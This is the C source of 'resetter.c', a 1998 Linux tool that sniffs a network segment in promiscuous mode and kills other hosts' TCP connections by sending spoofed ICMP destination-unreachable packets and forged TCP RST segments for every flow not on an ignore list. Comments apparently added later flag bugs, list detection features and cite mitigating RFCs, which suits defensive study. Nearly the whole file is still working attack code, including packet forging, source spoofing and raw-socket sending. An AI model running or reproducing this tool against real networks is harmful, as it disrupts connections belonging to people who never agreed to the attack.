/* resetter.c 11 feb 1998 by Stok */
/* large parts ripped from "ipl.c" and "puke.c".. */
/* code clean-up for c5 release 22 nov 1998 */
/* windows NT (at least 4.0) seems to ignore the icmp-packets?! */
/* added tcp RST connection resetting 30 nov 1998 */
#include <sys/types.h>
#include <sys/socket.h>
#include <sys/time.h>
#include <sys/ioctl.h>
#include <string.h>
#include <netinet/in.h>
#include <signal.h>
#include <stdio.h>
#include <netdb.h>
#include <netinet/tcp.h>
#include <netinet/udp.h>
#include <netinet/ip_icmp.h>
#include <netinet/if_ether.h>
#include <unistd.h>
#include <net/if.h>
#include <stdlib.h>
#include <arpa/inet.h>
/* Total length of the datagram built by sendkill(): outer IP header, ICMP
   header, then a quoted inner IP header and 8 bytes of its payload. */
#define PACKETSIZE (sizeof(struct iphdr) + sizeof(struct icmphdr) + \
sizeof(struct iphdr) + 8)
/* Length of the ICMP part only (ICMP header plus quoted data); this is the
   span the ICMP checksum is computed over in sendkill(). */
#define ICMPSIZE (sizeof(struct icmphdr) + sizeof(struct iphdr) + 8)
/* Byte offsets into the sendkill() buffer: quoted TCP header bytes, quoted
   inner IP header, and ICMP header.  All of them assume 20-byte IP headers
   without options, since they use sizeof(struct iphdr). */
#define offsetTCP (sizeof(struct iphdr) + sizeof(struct icmphdr) + \
sizeof(struct iphdr))
#define offsetIP (sizeof(struct iphdr) + sizeof(struct icmphdr))
#define offsetICMP (sizeof(struct iphdr))
/* ICMP code sent together with type 3 (destination unreachable) in
   sendkill().  Code 10 is "host administratively prohibited". */
#define thecode 10
/* SIGINT disposition installed by main() and the one it replaced.  old_sa is
   filled in but not read again in this listing. */
struct sigaction new_sa, old_sa;
void sigint (int);
/* Receive buffer for one frame read from the capture socket: Ethernet
   header, IP header, then whatever follows. */
struct etherpacket
{
struct ethhdr eth;
struct iphdr ip;
char data[60000];
};
int initdevice (char *, int);
/* NOTE(review): printdata is declared here but no definition or call appears
   in this listing. */
void printdata (char *, long);
u_short cksum (u_short * buf, int nwords);
void sendkill (long fromhost, int fromport, long tohost, int toport);
void killtcp (struct iphdr *);
/* Capture interface name; hard-coded, there is no command-line override. */
char device[] = "eth0";
/* Zero-terminated array of addresses (as returned by inet_addr) whose
   traffic main() leaves alone.  Allocated and filled in main(). */
long *ignores;
/* Entry point.  Puts the interface named by `device` into promiscuous mode,
   then loops forever reading frames.  For every captured IPv4/TCP frame whose
   source and destination are both absent from the ignore list given on the
   command line, it calls sendkill() once per direction (forged ICMP
   destination-unreachable) and, unless the segment already carries RST or
   FIN, killtcp() (forged TCP RST).
   Observable side effects for a defender: the interface gains IFF_PROMISC
   (see initdevice), and the segment sees ICMP type 3 / code 10 datagrams
   mirroring the address pairs of live TCP flows.
   Never returns; the process ends through exit() here or in sigint(). */
int
main (int argc, char **argv)
{
/* Promiscuous mode is switched on before the arguments are checked, so even
   the usage path below toggles the interface flag on and off again. */
int if_eth_fd = initdevice (device, 1);
struct etherpacket ep;
struct sockaddr dest;
struct iphdr *ip;
struct tcphdr *tcp;
fd_set rd;
int dlen, cnt;
/* Install sigint() for Ctrl-C so promiscuous mode is cleared on exit. */
new_sa.sa_handler = &sigint;
sigemptyset (&new_sa.sa_mask);
new_sa.sa_flags = 0;
sigaction (SIGINT, &new_sa, &old_sa);
if (argc == 1)
{
printf ("Usage:\n");
printf ("%s ignore-ip [...]\n", argv[0]);
initdevice (device, 0);
exit (-1);
}
/* argc slots for argc-1 addresses: calloc zero-fills, so the unused last
   slot is the list terminator.  NOTE(review): the calloc result and the
   inet_addr results are not checked; an argument that parses to 0 would end
   the list early in the scan below. */
ignores = (long *) calloc ((size_t) argc, sizeof (long));
argc--;
for (cnt = 0; cnt < argc; cnt++)
ignores[cnt] = inet_addr (argv[cnt+1]);
while (1)
{
bzero (&dest, sizeof (dest));
dlen = 0;
FD_ZERO (&rd);
FD_SET (if_eth_fd, &rd);
/* Header pointers are placed 2 bytes before the struct members; presumably
   this undoes alignment padding after the 14-byte Ethernet header -- TODO
   confirm against the target ABI.  tcp is a fixed offset past ip, so IP
   options are not accounted for. */
ip = (struct iphdr *) (((unsigned long) &ep.ip) - 2);
tcp = (struct tcphdr *) (((unsigned long) &ep.data) - 2);
/* NOTE(review): the return values of select and recvfrom are ignored, so a
   failed or short read leaves ep holding stale or partial data that is then
   parsed as a frame.  dlen is 0 on entry, so no sender address is returned. */
select (if_eth_fd + 1, &rd, NULL, NULL, NULL);
recvfrom (if_eth_fd, &ep, sizeof (ep), 0, &dest, &dlen);
/* Scan the ignore list; 44538 is used as an in-band "matched" marker for
   cnt.  The comparison runs before the frame is known to be IPv4. */
for (cnt = 0; ignores[cnt]; cnt++)
if (ip->saddr == ignores[cnt] || ip->daddr == ignores[cnt])
{
cnt = 44538;
break;
}
if (cnt != 44538)
/* IPv4 ethertype and IP protocol 6 (TCP) only. */
if (ep.eth.h_proto == ntohs (ETH_P_IP) && ip->protocol == 6)
{
/* One ICMP error per direction; ports are passed in host byte order. */
sendkill (ip->saddr, ntohs (tcp->source), ip->daddr, ntohs (tcp->dest));
sendkill (ip->daddr, ntohs (tcp->dest), ip->saddr, ntohs (tcp->source));
/* Segments that already have RST or FIN set are not passed to killtcp. */
if (!(tcp->rst || tcp->fin))
killtcp (ip);
}
}
}
/* Protocol argument for the capture socket: IPv4 ethertype in network order. */
#define PROTO htons(ETH_P_IP)
/* Open a packet-capture socket and set or clear promiscuous mode.
   device: interface name, copied into the ifreq.
   pflag:  non-zero sets IFF_PROMISC, zero clears it.
   Returns the new socket descriptor; on any failure prints a message with
   perror and exits with status 1.
   Every call opens a new socket.  The callers that pass pflag == 0 (usage
   path in main, sigint) discard the descriptor and exit right after.
   Clearing is unconditional: the flag state found before the program
   started is not remembered or restored.
   Defender notes: SOCK_PACKET is the obsolete Linux capture interface, and
   both it and SIOCSIFFLAGS need elevated network privileges.  A flag set
   this way is part of the interface flags, so it should be visible to
   interface-flag monitoring on the host -- verify on the kernel in use. */
int
initdevice (char *device, int pflag)
{
int if_fd = 0;
struct ifreq ifr;
if ((if_fd = socket (AF_INET, SOCK_PACKET, PROTO)) < 0)
{
perror ("Can't get socket");
exit (1);
}
/* NOTE(review): ifr is not zeroed and strncpy does not terminate a name of
   IFNAMSIZ or more characters; the only name passed in this file is "eth0". */
strncpy (ifr.ifr_name, device, IFNAMSIZ);
/* Read-modify-write of the interface flags so other flags are preserved. */
if (ioctl (if_fd, SIOCGIFFLAGS, &ifr) < 0)
{
close (if_fd);
perror ("Can't get flags");
exit (1);
}
if (pflag)
ifr.ifr_flags |= IFF_PROMISC;
else
ifr.ifr_flags &= ~(IFF_PROMISC);
if (ioctl (if_fd, SIOCSIFFLAGS, &ifr) < 0)
{
close (if_fd);
perror ("Can't set flags");
exit (1);
}
return (if_fd);
}
/* SIGINT handler: print a notice, clear promiscuous mode on the capture
   interface through initdevice (device, 0), then exit with status 0.
   The signal number is not used. */
void
sigint (int a)
{
  (void) a;
  fputs ("\nSIGINT caught. Exiting.\n", stdout);
  initdevice (device, 0);
  exit (0);
}
/* Not much of this function is mine // Stok */
/* Build and send one forged ICMP destination-unreachable datagram.
   fromhost/tohost: IPv4 addresses as stored in a captured IP header.
   fromport/toport: TCP ports in host byte order.
   The outer IP header goes from fromhost to tohost; the quoted inner header
   claims a TCP packet from tohost to fromhost that could not be delivered.
   The outer source is therefore fromhost, not the sending machine's own
   address, which makes source-address validation at the access layer
   relevant.
   Fixed values set below that can serve as detection features: ICMP type 3
   code 10; outer IP id 3, TTL 255, TOS (7 << 5) | 4; quoted inner header with
   TTL 24, total length 0x2C and checksum field 3805; quoted TCP sequence
   field 0x1984.  RFC 5927 documents the receiver-side checks that lead TCP
   stacks to ignore forged ICMP errors of this kind.
   Exits with status -1 if the raw socket or the packet buffer cannot be
   obtained; a failed or short send is only reported with perror. */
void
sendkill (long fromhost, int fromport, long tohost, int toport)
{
char *packet;
struct sockaddr_in local, remote;
/* Raw socket, created on the first call and kept for the process lifetime. */
static int sock = 0;
// printf ("%X %X -> %X %X\n", fromhost, fromport, tohost, toport);
/* NOTE(review): sin_port is 16 bits wide but sizeof (int) bytes are copied,
   and sizeof (long) bytes go into the 32-bit sin_addr.  The port overrun is
   overwritten by the address copies that follow; the address copies overrun
   their field wherever long is wider than 32 bits.  local and remote are
   otherwise uninitialised. */
memcpy (&(local.sin_port), &fromport, sizeof (int));
memcpy (&(remote.sin_port), &toport, sizeof (int));
memcpy (&(local.sin_addr), &fromhost, sizeof (long));
memcpy (&(remote.sin_addr), &tohost, sizeof (long));
local.sin_family = AF_INET;
remote.sin_family = AF_INET;
if (!sock)
{
/* Protocol 255 is IPPROTO_RAW on Linux: the caller supplies the IP header. */
sock = socket (AF_INET, SOCK_RAW, 255);
if (sock == -1)
{
perror ("Getting raw socket");
exit (-1);
}
}
/*
. Get memory for the packet
*/
/* malloc, not calloc: only the fields assigned below are written. */
packet = (char *) malloc (PACKETSIZE);
if (!packet)
{
perror ("Getting space for packet");
exit (-1);
}
/*
. Fill in our pretended TCP header
. note - since this was allegedly an outgoing packet... we have
. to flip the source and destination stuff
*/
{
struct tcphdr *fake_tcp;
fake_tcp = (struct tcphdr *) (packet + offsetTCP);
fake_tcp->dest = htons (fromport);
fake_tcp->source = htons (toport);
/* Constant stored without htonl, so its wire byte order follows the host. */
fake_tcp->seq = 0x1984;
}
/*
. fill in the fake IP header.
. the same reversal as above still applies.. the packet was sent
. to our machine (yeah right)
*/
{
struct iphdr *fake_ip;
fake_ip = (struct iphdr *) (packet + offsetIP);
/* these fields are irrelevant -- never checked?? */
fake_ip->version = 4;
/* this was much longer.. once */
fake_ip->tot_len = htons (0x2C);
fake_ip->tos = 0;
fake_ip->id = htons (getpid () & 255);
fake_ip->frag_off = 0;
fake_ip->ttl = 24; /* not so long to live anymore */
/* this CAN'T be checked..so do something != 0 */
fake_ip->check = 3805;
/* these fields are used .. */
fake_ip->ihl = 5;
bcopy ((char *) &local.sin_addr, &fake_ip->daddr,
sizeof (fake_ip->daddr));
bcopy ((char *) &remote.sin_addr, &fake_ip->saddr,
sizeof (fake_ip->saddr));
fake_ip->protocol = 6; /* a TCP packet */
}
/*
. fill in the ICMP header
. this is actually rather trivial, though don't forget the checksum
*/
{
struct icmphdr *icmp;
icmp = (struct icmphdr *) (packet + offsetICMP);
icmp->type = 3;
icmp->code = thecode; /* this will generate an error message */
icmp->un.gateway = 0;
/* cksum takes a count of 16-bit words, hence the byte length >> 1. */
icmp->checksum = cksum ((u_short *) (icmp), ICMPSIZE >> 1);
}
/*
. finally, fill in the IP header
. this is almost the same as above.. though this time, it is the
. ip header that really takes the packet places. make sure the
. checksum and addresses are right
*/
{
struct iphdr *real_ip;
real_ip = (struct iphdr *) packet;
real_ip->version = 4;
real_ip->ihl = 5;
real_ip->tot_len = htons (PACKETSIZE);
real_ip->tos = (7 << 5) | 4;
real_ip->ttl = 255;
real_ip->protocol = 1;
real_ip->check = 0;
real_ip->id = htons (3);
real_ip->frag_off = 0;
bcopy ((char *) &local.sin_addr, &real_ip->saddr,
sizeof (real_ip->saddr));
bcopy ((char *) &remote.sin_addr, &real_ip->daddr,
sizeof (real_ip->daddr));
/*
real_ip->saddr = htonl(ntohl(real_ip->daddr) & 0xffffff00L);
*/
real_ip->check = cksum ((u_short *) packet,
sizeof (struct iphdr) >> 1);
}
/*
.
. and now.. finally... send it out into the net
*/
{
int result;
result = sendto (sock, packet, PACKETSIZE, 0,
(struct sockaddr *) &remote, sizeof (remote));
/* Error and short send are both reported the same way; no retry. */
if (result != PACKETSIZE)
{
perror ("sending packet");
}
free (packet);
}
}
/* Send a TCP segment with only RST set, derived from a captured packet.
   ip: pointer to the captured IP header; the TCP header is taken to follow
   it directly at sizeof (struct iphdr), so IP options are not handled.
   The first sizeof (struct iphdr) + sizeof (struct tcphdr) bytes of the
   capture are copied and sent to the captured destination address.  The IP
   header and TCP ports are reused unchanged (the swap code is commented
   out); the sequence field takes the captured ack_seq and the ack field the
   captured seq plus one.
   Detection note: because the IP header is copied verbatim, the forged
   segment carries the same IP id, TTL and addresses as the genuine packet it
   was derived from.  Protection against injection by a host that can see the
   flow needs segment authentication (for example TCP-AO, RFC 5925, or
   IPsec); RFC 5961 covers RST validation against blind senders.
   Exits with status -1 if the raw socket cannot be created. */
void
killtcp (struct iphdr *ip)
{
char *packet;
/* Raw socket, created on the first call; separate from the one in sendkill. */
static int sock = 0;
struct tcphdr *tcp;
int result;
struct sockaddr_in remote;
u_int32_t tmp32;
// u_int16_t tmp16;
/* NOTE(review): the malloc result is not checked before use. */
packet = (char *) malloc (sizeof (struct iphdr) + sizeof (struct tcphdr));
tcp = (struct tcphdr *) (packet + sizeof (struct iphdr));
/* NOTE(review): tcp points into the buffer that is only filled by the
   memcpy two statements further down, so this reads unset memory, and the
   copy sizes are wider than the 16-bit port field (and than the 32-bit
   address field where long is 64 bits). */
memcpy (&(remote.sin_port), &(tcp->dest), sizeof (int));
memcpy (&(remote.sin_addr), &(ip->daddr), sizeof (long));
remote.sin_family = AF_INET;
/* Assumes the capture holds at least this many bytes after ip. */
memcpy (packet, (char *) ip, sizeof (struct iphdr) + sizeof (struct tcphdr));
if (!sock)
{
sock = socket (AF_INET, SOCK_RAW, 255);
if (sock == -1)
{
perror ("Getting raw socket");
exit (-1);
}
}
/* Clear every flag except RST in the copied header. */
tcp->fin = 0;
tcp->syn = 0;
tcp->rst = 1;
tcp->psh = 0;
tcp->ack = 0;
tcp->urg = 0;
/* Exchange the sequence fields: seq <- old ack_seq, ack_seq <- old seq + 1. */
tmp32 = tcp->ack_seq;
tcp->ack_seq = htonl (ntohl (tcp->seq)+1);
tcp->seq = tmp32;
/* tmp16 = tcp->source;
tcp->source = tcp->dest;
tcp->dest = tmp16;
tmp32 = ip->saddr;
ip->saddr = ip->daddr;
ip->daddr = tmp32;
*/
/* The result is stored through ip, i.e. into the caller's capture buffer,
   not into packet. */
ip->check = cksum ((u_short *) packet, sizeof (struct iphdr) >> 1);
/* result is assigned but never examined; &remote is passed without the
   cast to struct sockaddr * that sendkill uses. */
result = sendto (sock, packet, sizeof (struct iphdr) + sizeof (struct tcphdr), 0, &remote, sizeof (remote));
free (packet);
}
/* One's-complement checksum over 16-bit words.
   buf:    first word to sum; read as host-order u_short values.
   nwords: number of 16-bit words (callers pass a byte length >> 1); a value
           of zero or less sums nothing.
   Returns the complement of the sum after two carry folds, truncated to
   16 bits. */
u_short
cksum (u_short * buf, int nwords)
{
  unsigned long acc = 0;
  int i;

  for (i = 0; i < nwords; i++)
    acc += buf[i];

  /* Fold the carries above bit 15 back into the low word, twice. */
  acc = (acc & 0xffff) + (acc >> 16);
  acc += acc >> 16;

  return (u_short) ~acc;
}